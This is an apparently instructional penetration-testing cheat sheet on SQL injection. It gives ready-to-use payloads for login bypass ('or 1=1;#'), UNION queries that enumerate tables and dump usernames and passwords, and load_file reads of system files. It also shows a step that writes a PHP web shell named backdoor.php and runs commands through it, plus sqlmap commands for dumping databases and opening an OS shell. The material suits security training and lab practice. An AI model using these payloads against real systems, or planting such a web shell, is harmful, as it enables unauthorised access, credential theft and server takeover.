SQL injection is a common vulnerability that enables attackers to inject commands and interact with databases. While typically exploited for data leakage, SQL vulnerabilities can also lead to server compromise.

Detection

The first step is to find input fields on the target site that likely interact with databases, such as login field, search fields, message threads, etc. We can use a single quote (') to check for potential vulnerabilities. Ideally, this will cause an error and we'll receive an indication from the server.

Authentication bypass

In normal operation we expect a login form to query the database, something like:

select * from users where name = 'admin' and password = 'password123';

We can manipulate the input to change how the command is processed by the database:

admin' or 1=1;#
admin' or 1=1 LIMIT 1;#

Which results in query modification:

select * from users where name = 'admin' or 1=1;#' and password = 'password123';

The introduction of the single quote before the password entry removes the remainder of the statement. If this causes errors, we can also request a fixed number of returns using the LIMIT statement.

select * from users where name = 'admin' or 1=1 LIMIT 1;#

To replicate in a web application, we submit the following payload into a username field:

tom' or 1=1 LIMIT 1;#

This should result in an authenticated session login.

Enumerating Databases

http://10.14.1.23/test.php?id=1' - begin testing with single quote
http://10.14.1.23/test.php?id=1 order by 1 - attempt to sort by first column

If this is successful and we receive the name of column, we can continue to increase the number until we receive an error. This can be performed manually or automated in BurpSuite Repeater.

Next we can extract row information using the UNION statement.

http://10.14.1.23/test.php?id=1 union all select 1, 2, 3, 4

Depending on how the information is displayed, we can then modify our input to extract more information. In the following example we've identified that the column three falls in a logical spot on the page.

http://10.14.1.23/test.php?id=1 union all select 1, 2, @@version
http://10.14.1.23/test.php?id=1 union all select 1, 2, user()
http://10.14.1.23/test.php?id=1 union all select 1, 2, table_name from information_schema.tables
http://10.14.1.23/test.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'
http://10.14.1.23/test.php?id=1 union all select 1, username, password from users

Code Execution

In some cases we can use SQL injection to read/write system files and possibly write PHP onto the system for execution.

http://10.14.1.23/test.php?id=1 union all select 1, 2, load_file('C://Windows/System32/drivers/etc/hosts')

If this is successful we can attempt to create a malicious file on the server.

http://10.14.1.23/test.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

We may then be able to access the file with a command.

http://10.14.1.23/backdoor.php?cmd=id

If this succeeds, we can expand access by installing a full php shell on the server.

SQLmap

Tools such as SQLmap simplify the extraction of information from databases.

sqlmap -u http://10.14.1.23/test.php?id=1 -p "id"
sqlmap -u http://10.14.1.23/test.php?id=1 -p "id" --dbms=mysql --dump

SQLmap also has numerous other features including firewall bypass and attempting to gain a shell on the target system.

sqlmap -u http://10.14.1.23/test.php?id=1 -p "id" --dbms=mysql --os-shell